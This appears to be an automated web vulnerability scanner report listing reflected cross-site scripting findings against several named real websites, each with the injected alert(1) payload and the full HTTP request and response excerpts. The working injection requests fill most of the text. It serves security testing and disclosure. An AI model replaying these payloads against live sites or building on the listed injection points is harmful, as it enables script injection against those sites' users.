The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 269cf<a>57679d84bdc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /weblog/2006/06/again269cf<a>57679d84bdc/ HTTP/1.1 Host: dean.edwards.name Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Tue, 01 Feb 2011 15:33:37 GMT Server: Apache/2.2.6 (Win32) PHP/5.2.5 X-Powered-By: PHP/5.2.5 X-Pingback: http://dean.edwards.name/weblog/xmlrpc.php Expires: Tue, 01 Feb 2011 15:33:37 GMT Last-Modified: Tue, 01 Feb 2011 15:33:37 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 1352 Connection: close Content-Type: text/html; charset=UTF-8
1.126. http://dean.edwards.name/weblog/2006/06/again/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://dean.edwards.name
Path:
/weblog/2006/06/again/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b483d"><script>alert(1)</script>e257170cefc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b483d\"><script>alert(1)</script>e257170cefc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /weblog/2006/06/again/?b483d"><script>alert(1)</script>e257170cefc=1 HTTP/1.1 Host: dean.edwards.name Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 592e2<script>alert(1)</script>9fd54abbf1d was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /red/psi/p.json?callback=_ate.ad.hpr592e2<script>alert(1)</script>9fd54abbf1d HTTP/1.1 Host: ds.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Length: 311 Content-Type: text/javascript Set-Cookie: bt=; Domain=.addthis.com; Expires=Tue, 01 Feb 2011 15:32:28 GMT; Path=/ Set-Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg%3d%3d; Domain=.addthis.com; Expires=Mon, 02 May 2011 15:32:28 GMT; Path=/ Set-Cookie: dt=X; Domain=.addthis.com; Expires=Thu, 03 Mar 2011 15:32:28 GMT; Path=/ Set-Cookie: di=%7B%7D..1296574348.19F|1296574348.19A; Domain=.addthis.com; Expires=Thu, 31-Jan-2013 04:49:40 GMT; Path=/ P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA" Expires: Tue, 01 Feb 2011 15:32:28 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Tue, 01 Feb 2011 15:32:28 GMT Connection: close
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 1cee6<script>alert(1)</script>ded05b5064d was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /red/psi/sites/www.ehow.com/p.json?callback=_ate.ad.hpr1cee6<script>alert(1)</script>ded05b5064d&uid=4d1ec56b7612a62c&url=http%3A%2F%2Fwww.ehow.com%2Fcomputer-software%2F&ref=http%3A%2F%2Fburp%2Fshow%2F4&o1jt6o HTTP/1.1 Host: ds.addthis.com Proxy-Connection: keep-alive Referer: http://s7.addthis.com/static/r07/sh30.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg%3d%3d; dt=X; di=%7B%222%22%3A%22914803576615380%2CrcHW800iZiMAAocf%22%7D..1295452270.19F|1296507257.60|1293848200.66; psc=4; uid=4d1ec56b7612a62c
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Length: 290 Content-Type: text/javascript Set-Cookie: bt=; Domain=.addthis.com; Expires=Wed, 02 Feb 2011 15:32:00 GMT; Path=/ Set-Cookie: dt=X; Domain=.addthis.com; Expires=Fri, 04 Mar 2011 15:32:00 GMT; Path=/ Set-Cookie: di=%7B%222%22%3A%22914803576615380%2CrcHW800iZiMAAocf%22%7D..1295452270.19F|1296660720.60|1293848200.66; Domain=.addthis.com; Expires=Fri, 01-Feb-2013 11:36:19 GMT; Path=/ P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA" Expires: Wed, 02 Feb 2011 15:32:00 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Wed, 02 Feb 2011 15:32:00 GMT Connection: close
The value of the jsoncallback request parameter is copied into the HTML document as plain text between tags. The payload c49f0<script>alert(1)</script>f5a6d19584e was submitted in the jsoncallback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /data/service-calendar.json?widget_query=true&zipcode=All&year=2009&month=10&day=12&max=4&widget_category_id=0&widget_category=All&jsoncallback=jsonp1255386312275c49f0<script>alert(1)</script>f5a6d19584e&_=1255386319932 HTTP/1.1 Host: gocitykids.parentsconnect.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache/2.0.63 (Unix) mod_jk/1.2.27 Content-Language: en Content-Type: text/json;charset=UTF-8 Content-Length: 20190 Date: Wed, 02 Feb 2011 19:21:09 GMT Connection: close
jsonp1255386312275c49f0<script>alert(1)</script>f5a6d19584e( [{"id":"211700","name":"Groundhog Day (PG)","attractionAlias":"the-colonial-theatre-227-bridge-street-phoenixville-pa-19460-3449-us","phone":"610.917.0223; 610.917.1228","url":"http://www.thecoloni ...[SNIP]...
1.130. http://it.toolbox.com/blogs/database-soup [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://it.toolbox.com
Path:
/blogs/database-soup
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e9deb'-alert(1)-'530e4bffa2c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/database-soup?e9deb'-alert(1)-'530e4bffa2c=1 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 61209 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Tue, 01 Feb 2011 14:26:42 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Database So ...[SNIP]... aBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3ddatabase-soup%26e9deb'-alert(1)-'530e4bffa2c%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl;
...[SNIP]...
1.131. http://it.toolbox.com/blogs/database-talk [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://it.toolbox.com
Path:
/blogs/database-talk
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e9726'-alert(1)-'362cf24ba31 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/database-talk?e9726'-alert(1)-'362cf24ba31=1 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 63475 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Tue, 01 Feb 2011 14:26:40 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Database Ta ...[SNIP]... aBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3ddatabase-talk%26e9726'-alert(1)-'362cf24ba31%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl;
...[SNIP]...
1.132. http://it.toolbox.com/blogs/db2luw [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://it.toolbox.com
Path:
/blogs/db2luw
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 29327'-alert(1)-'14b42306d5d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/db2luw?29327'-alert(1)-'14b42306d5d=1 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 62990 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Tue, 01 Feb 2011 14:26:39 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> An Expert's ...[SNIP]... r != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3ddb2luw%2629327'-alert(1)-'14b42306d5d%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl;
...[SNIP]...
1.133. http://it.toolbox.com/blogs/db2zos [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://it.toolbox.com
Path:
/blogs/db2zos
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2553e'-alert(1)-'a0a7b564b7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/db2zos?2553e'-alert(1)-'a0a7b564b7=1 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 78368 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Tue, 01 Feb 2011 14:26:39 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Getting the ...[SNIP]... r != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3ddb2zos%262553e'-alert(1)-'a0a7b564b7%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl;
...[SNIP]...
1.134. http://it.toolbox.com/blogs/elsua [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://it.toolbox.com
Path:
/blogs/elsua
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f3acb'-alert(1)-'93981464ca0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/elsua?f3acb'-alert(1)-'93981464ca0=1 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 64515 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Tue, 01 Feb 2011 14:26:40 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> elsua: The ...[SNIP]... er != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3delsua%26f3acb'-alert(1)-'93981464ca0%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl;
...[SNIP]...
1.135. http://it.toolbox.com/blogs/juice-analytics [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://it.toolbox.com
Path:
/blogs/juice-analytics
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 79855'-alert(1)-'e9a3a93587c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/juice-analytics?79855'-alert(1)-'e9a3a93587c=1 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 61934 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Tue, 01 Feb 2011 14:26:41 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Juice Analy ...[SNIP]... tnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3djuice-analytics%2679855'-alert(1)-'e9a3a93587c%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl;
...[SNIP]...
1.136. http://it.toolbox.com/blogs/minimalit [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://it.toolbox.com
Path:
/blogs/minimalit
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3719a'-alert(1)-'3be2065b10e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/minimalit?3719a'-alert(1)-'3be2065b10e=1 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 60105 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Tue, 01 Feb 2011 14:26:42 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Minimal IT: ...[SNIP]... = ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3dminimalit%263719a'-alert(1)-'3be2065b10e%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl;
...[SNIP]...
1.137. http://it.toolbox.com/blogs/penguinista-databasiensis [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://it.toolbox.com
Path:
/blogs/penguinista-databasiensis
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2f871'-alert(1)-'61cc9848b43 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/penguinista-databasiensis?2f871'-alert(1)-'61cc9848b43=1 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 46117 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Tue, 01 Feb 2011 14:26:40 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Penguinista ...[SNIP]...
1.138. http://it.toolbox.com/blogs/ppmtoday [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://it.toolbox.com
Path:
/blogs/ppmtoday
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f740'-alert(1)-'6ebdefa1aa5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday?1f740'-alert(1)-'6ebdefa1aa5=1 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 63708 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Tue, 01 Feb 2011 14:26:39 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Future Stat ...[SNIP]... != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3dppmtoday%261f740'-alert(1)-'6ebdefa1aa5%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload d10fd<script>alert(1)</script>5443b795f8c was submitted in the csid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 98161"%3balert(1)//e83152febaa was submitted in the l parameter. This input was echoed as 98161";alert(1)//e83152febaa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /KonaGet.js?u=1296570530969&p=131855&k=http%3A//www.montanaplates.com/880540-Twitter-Tweets-about-Llc-as-of-January-20-2011.htmljpNNP3&al=1&l=http%3A//www.montanaplates.com/880540-Twitter-Tweets-about-Llc-as-of-January-20-2011.html98161"%3balert(1)//e83152febaa&t=Twitter+Tweets+about+Llc+as+of+January+20+%2C+2011+-+Montana+Plates&m1=Montana+LLC+%2C+llc+%2C+Montana+Liscence+plates&rId=0&rl=0&1=14&mod=65563&rm=1&dc_aff_id=0&add=FlashVer_Shockwave%20Flash%2010.1%20r103|user_|session_ HTTP/1.1 Host: kona5.kontera.com Proxy-Connection: keep-alive Referer: http://www.montanaplates.com/880540-Twitter-Tweets-about-Llc-as-of-January-20-2011.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: KONA_USER_GUID=F3BC9B36-258A-11E0-835C-00163E201265
Response
HTTP/1.0 200 OK Content-Type: text/plain Connection: close Content-Length: 11135
The value of the rId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d7bc"-alert(1)-"ecbff65bd55 was submitted in the rId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /KonaGet.js?u=1296570530969&p=131855&k=http%3A//www.montanaplates.com/880540-Twitter-Tweets-about-Llc-as-of-January-20-2011.htmljpNNP3&al=1&l=http%3A//www.montanaplates.com/880540-Twitter-Tweets-about-Llc-as-of-January-20-2011.html&t=Twitter+Tweets+about+Llc+as+of+January+20+%2C+2011+-+Montana+Plates&m1=Montana+LLC+%2C+llc+%2C+Montana+Liscence+plates&rId=09d7bc"-alert(1)-"ecbff65bd55&rl=0&1=14&mod=65563&rm=1&dc_aff_id=0&add=FlashVer_Shockwave%20Flash%2010.1%20r103|user_|session_ HTTP/1.1 Host: kona5.kontera.com Proxy-Connection: keep-alive Referer: http://www.montanaplates.com/880540-Twitter-Tweets-about-Llc-as-of-January-20-2011.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: KONA_USER_GUID=F3BC9B36-258A-11E0-835C-00163E201265
Response
HTTP/1.0 200 OK Content-Type: text/plain Connection: close Content-Length: 10579
The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 73495<script>alert(1)</script>00d7074f8fe was submitted in the mbox parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /m2/millenniumhotels/mbox/standard?mboxHost=www.millenniumhotels.com&mboxSession=1296573995979-796819&mboxPage=1296573995979-796819&screenHeight=1200&screenWidth=1920&browserWidth=1036&browserHeight=1012&browserTimeOffset=-360&colorDepth=16&mboxCount=2&hotelId=11536&mbox=Homepage_LeftNavStyle73495<script>alert(1)</script>00d7074f8fe&mboxId=0&mboxTime=1296552397746&mboxURL=http%3A%2F%2Fwww.millenniumhotels.com%2Fmillenniumboston%2Findex.html&mboxReferrer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dmillenium%2Bboston&mboxVersion=39 HTTP/1.1 Host: millenniumhotels.tt.omtrdc.net Proxy-Connection: keep-alive Referer: http://www.millenniumhotels.com/millenniumboston/index.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: text/javascript Content-Length: 217 Date: Wed, 02 Feb 2011 15:36:11 GMT Server: Test & Target
1.143. http://msn.foxsports.com/cbk/story/Texas-trounces-Texas-A&M-for-Big-12-win-013111 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b51f6'-alert(1)-'4ced383f894 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cbk/story/Texas-trounces-Texas-A&M-for-Big-12-win-013111?b51f6'-alert(1)-'4ced383f894=1 HTTP/1.1 Host: msn.foxsports.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Length: 253307 Content-Type: text/html;charset=UTF-8 X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5 Cache-Control: max-age=21 Date: Wed, 02 Feb 2011 15:37:31 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
startComments('StoryComments', '26549032'); // load up team comments </script> ...[SNIP]...
1.144. http://msn.foxsports.com/collegefootball/lists/scout-top-25-team-recruit-rankings [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 14d4a'-alert(1)-'ab313af8cd3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
